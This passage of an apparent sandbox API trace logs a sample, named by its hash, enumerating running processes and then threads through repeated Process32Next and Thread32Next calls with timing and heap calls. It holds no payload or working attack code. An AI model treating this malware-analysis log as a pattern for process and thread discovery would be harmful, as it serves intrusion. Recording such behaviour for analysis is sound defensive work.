Size=0x64) returned 0x673558 [0191.208] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.208] Process32Next (in: hSnapshot=0x578, lppe=0x312f258 | out: lppe=0x312f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="mscorsvw.exe")) returned 1 [0191.209] GetTickCount () returned 0xf48c [0191.209] GetCurrentThreadId () returned 0x66c [0191.209] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.210] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.210] Process32Next (in: hSnapshot=0x578, lppe=0x312f258 | out: lppe=0x312f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="mscorsvw.exe")) returned 1 [0191.211] GetTickCount () returned 0xf48c [0191.211] GetCurrentThreadId () returned 0x66c [0191.211] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.212] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.212] Process32Next (in: hSnapshot=0x578, lppe=0x312f258 | out: lppe=0x312f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x18c, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0191.213] GetTickCount () returned 0xf48c [0191.213] GetCurrentThreadId () returned 0x66c [0191.213] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.214] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.214] Process32Next (in: hSnapshot=0x578, lppe=0x312f258 | out: lppe=0x312f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x318, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0191.215] GetTickCount () returned 0xf48c [0191.215] GetCurrentThreadId () returned 0x66c [0191.215] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.216] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.216] Process32Next (in: hSnapshot=0x578, lppe=0x312f258 | out: lppe=0x312f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x5fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0191.217] GetTickCount () returned 0xf48c [0191.217] GetCurrentThreadId () returned 0x66c [0191.217] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.218] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.218] Process32Next (in: hSnapshot=0x578, lppe=0x312f258 | out: lppe=0x312f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x6f8, pcPriClassBase=13, dwFlags=0x0, szExeFile="1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe")) returned 1 [0191.219] GetTickCount () returned 0xf48c [0191.219] GetCurrentThreadId () returned 0x66c [0191.219] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.220] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.220] Process32Next (in: hSnapshot=0x578, lppe=0x312f258 | out: lppe=0x312f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x6f8, pcPriClassBase=13, dwFlags=0x0, szExeFile="1918cc07f0b41a9e9dc1??????????????????????????????????")) returned 0 [0191.221] GetTickCount () returned 0xf49c [0191.221] Thread32First (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.223] GetCurrentThreadId () returned 0x66c [0191.223] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.223] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.223] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.225] GetTickCount () returned 0xf49c [0191.225] GetCurrentThreadId () returned 0x66c [0191.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.225] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.225] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.226] GetTickCount () returned 0xf49c [0191.227] GetCurrentThreadId () returned 0x66c [0191.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.227] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.227] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.228] GetTickCount () returned 0xf49c [0191.228] GetCurrentThreadId () returned 0x66c [0191.228] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.229] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.229] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.230] GetTickCount () returned 0xf49c [0191.230] GetCurrentThreadId () returned 0x66c [0191.230] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.230] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.231] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.232] GetTickCount () returned 0xf49c [0191.232] GetCurrentThreadId () returned 0x66c [0191.232] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.232] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.232] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.234] GetTickCount () returned 0xf49c [0191.234] GetCurrentThreadId () returned 0x66c [0191.234] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.234] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.234] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.236] GetTickCount () returned 0xf49c [0191.236] GetCurrentThreadId () returned 0x66c [0191.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.236] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.236] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.238] GetTickCount () returned 0xf4ac [0191.238] GetCurrentThreadId () returned 0x66c [0191.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.238] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.238] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.240] GetTickCount () returned 0xf4ac [0191.240] GetCurrentThreadId () returned 0x66c [0191.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.240] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.242] GetTickCount () returned 0xf4ac [0191.242] GetCurrentThreadId () returned 0x66c [0191.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.242] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.244] GetTickCount () returned 0xf4ac [0191.244] GetCurrentThreadId () returned 0x66c [0191.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.244] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.246] GetTickCount () returned 0xf4ac [0191.246] GetCurrentThreadId () returned 0x66c [0191.246] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.246] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.246] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.248] GetTickCount () returned 0xf4ac [0191.248] GetCurrentThreadId () returned 0x66c [0191.248] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.248] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.248] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.250] GetTickCount () returned 0xf4ac [0191.250] GetCurrentThreadId () returned 0x66c [0191.250] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.250] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.250] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.251] GetTickCount () returned 0xf4ac [0191.251] GetCurrentThreadId () returned 0x66c [0191.251] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.252] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.252] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.254] GetTickCount () returned 0xf4bb [0191.254] GetCurrentThreadId () returned 0x66c [0191.254] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.254] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.254] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.255] GetTickCount () returned 0xf4bb [0191.255] GetCurrentThreadId () returned 0x66c [0191.255] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.256] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.256] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.257] GetTickCount () returned 0xf4bb [0191.257] GetCurrentThreadId () returned 0x66c [0191.257] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.257] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.257] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.258] GetTickCount () returned 0xf4bb [0191.258] GetCurrentThreadId () returned 0x66c [0191.258] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.259] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.259] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.260] GetTickCount () returned 0xf4bb [0191.260] GetCurrentThreadId () returned 0x66c [0191.260] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.260] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.260] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.262] GetTickCount () returned 0xf4bb [0191.262] GetCurrentThreadId () returned 0x66c [0191.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.262] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.262] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.263] GetTickCount () returned 0xf4bb [0191.263] GetCurrentThreadId () returned 0x66c [0191.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.263] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.263] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.265] GetTickCount () returned 0xf4bb [0191.265] GetCurrentThreadId () returned 0x66c [0191.265] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.266] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.266] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.267] GetTickCount () returned 0xf4bb [0191.267] GetCurrentThreadId () returned 0x66c [0191.267] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.267] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.268] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.269] GetTickCount () returned 0xf4cb [0191.269] GetCurrentThreadId () returned 0x66c [0191.269] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.269] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.269] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.271] GetTickCount () returned 0xf4cb [0191.271] GetCurrentThreadId () returned 0x66c [0191.271] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.271] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.271] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.272] GetTickCount () returned 0xf4cb [0191.272] GetCurrentThreadId () returned 0x66c [0191.272] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.273] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.273] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.274] GetTickCount () returned 0xf4cb [0191.274] GetCurrentThreadId () returned 0x66c [0191.274] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.275] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.277] GetTickCount () returned 0xf4cb [0191.277] GetCurrentThreadId () returned 0x66c [0191.277] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.277] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.277] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.278] GetTickCount () returned 0xf4cb [0191.278] GetCurrentThreadId () returned 0x66c [0191.278] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.279] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.279] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.280] GetTickCount () returned 0xf4cb [0191.280] GetCurrentThreadId () returned 0x66c [0191.280] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.280] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.280] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.282] GetTickCount () returned 0xf4cb [0191.282] GetCurrentThreadId () returned 0x66c [0191.282] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.282] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.282] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.284] GetTickCount () returned 0xf4da [0191.284] GetCurrentThreadId () returned 0x66c [0191.284] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.284] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.284] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.286] GetTickCount () returned 0xf4da [0191.286] GetCurrentThreadId () returned 0x66c [0191.286] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.286] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.286] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.288] GetTickCount () returned 0xf4da [0191.288] GetCurrentThreadId () returned 0x66c [0191.288] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.288] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.288] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.290] GetTickCount () returned 0xf4da [0191.290] GetCurrentThreadId () returned 0x66c [0191.290] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.290] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.292] GetTickCount () returned 0xf4da [0191.292] GetCurrentThreadId () returned 0x66c [0191.292] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.292] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.292] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.294] GetTickCount () returned 0xf4da [0191.294] GetCurrentThreadId () returned 0x66c [0191.294] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.294] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.294] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.295] GetTickCount () returned 0xf4da [0191.295] GetCurrentThreadId () returned 0x66c [0191.296] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.296] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.296] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.297] GetTickCount () returned 0xf4da [0191.297] GetCurrentThreadId () returned 0x66c [0191.297] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.298] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.298] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.299] GetTickCount () returned 0xf4ea [0191.299] GetCurrentThreadId () returned 0x66c [0191.299] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.300] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.300] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.301] GetTickCount () returned 0xf4ea [0191.301] GetCurrentThreadId () returned 0x66c [0191.301] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.302] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.302] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.303] GetTickCount () returned 0xf4ea [0191.303] GetCurrentThreadId () returned 0x66c [0191.303] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.304] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.304] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.305] GetTickCount () returned 0xf4ea [0191.305] GetCurrentThreadId () returned 0x66c [0191.305] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.306] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.306] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.307] GetTickCount () returned 0xf4ea [0191.307] GetCurrentThreadId () returned 0x66c [0191.307] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.307] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.307] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.310] GetTickCount () returned 0xf4ea [0191.310] GetCurrentThreadId () returned 0x66c [0191.310] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.310] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.310] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.311] GetTickCount () returned 0xf4ea [0191.311] GetCurrentThreadId () returned 0x66c [0191.312] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.312] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.312] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.313] GetTickCount () returned 0xf4ea [0191.313] GetCurrentThreadId () returned 0x66c [0191.313] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.314] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.314] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.315] GetTickCount () returned 0xf4fa [0191.315] GetCurrentThreadId () returned 0x66c [0191.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.316] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.316] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.317] GetTickCount () returned 0xf4fa [0191.317] GetCurrentThreadId () returned 0x66c [0191.317] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.318] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.318] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.319] GetTickCount () returned 0xf4fa [0191.319] GetCurrentThreadId () returned 0x66c [0191.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.319] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.319] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.321] GetTickCount () returned 0xf4fa [0191.321] GetCurrentThreadId () returned 0x66c [0191.321] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.321] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.321] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.323] GetTickCount () returned 0xf4fa [0191.323] GetCurrentThreadId () returned 0x66c [0191.323] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.323] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.323] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.325] GetTickCount () returned 0xf4fa [0191.325] GetCurrentThreadId () returned 0x66c [0191.325] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.325] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.325] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.326] GetTickCount () returned 0xf4fa [0191.326] GetCurrentThreadId () returned 0x66c [0191.326] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.327] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.327] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.328] GetTickCount () returned 0xf4fa [0191.328] GetCurrentThreadId () returned 0x66c [0191.328] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.329] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.329] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.330] GetTickCount () returned 0xf4fa [0191.330] GetCurrentThreadId () returned 0x66c [0191.330] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.331] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.334] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.336] GetTickCount () returned 0xf509 [0191.336] GetCurrentThreadId () returned 0x66c [0191.336] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.336] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.336] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.338] GetTickCount () returned 0xf509 [0191.338] GetCurrentThreadId () returned 0x66c [0191.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.338] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.338] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.340] GetTickCount () returned 0xf509 [0191.340] GetCurrentThreadId () returned 0x66c [0191.340] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.340] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.342] GetTickCount () returned 0xf509 [0191.342] GetCurrentThreadId () returned 0x66c [0191.342] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.342] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.342] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.344] GetTickCount () returned 0xf509 [0191.344] GetCurrentThreadId () returned 0x66c [0191.344] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.344] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.344] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.346] GetTickCount () returned 0xf509 [0191.346] GetCurrentThreadId () returned 0x66c [0191.346] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.346] HeapFree (in: hHeap=0x620000, dwFlags=0x0, 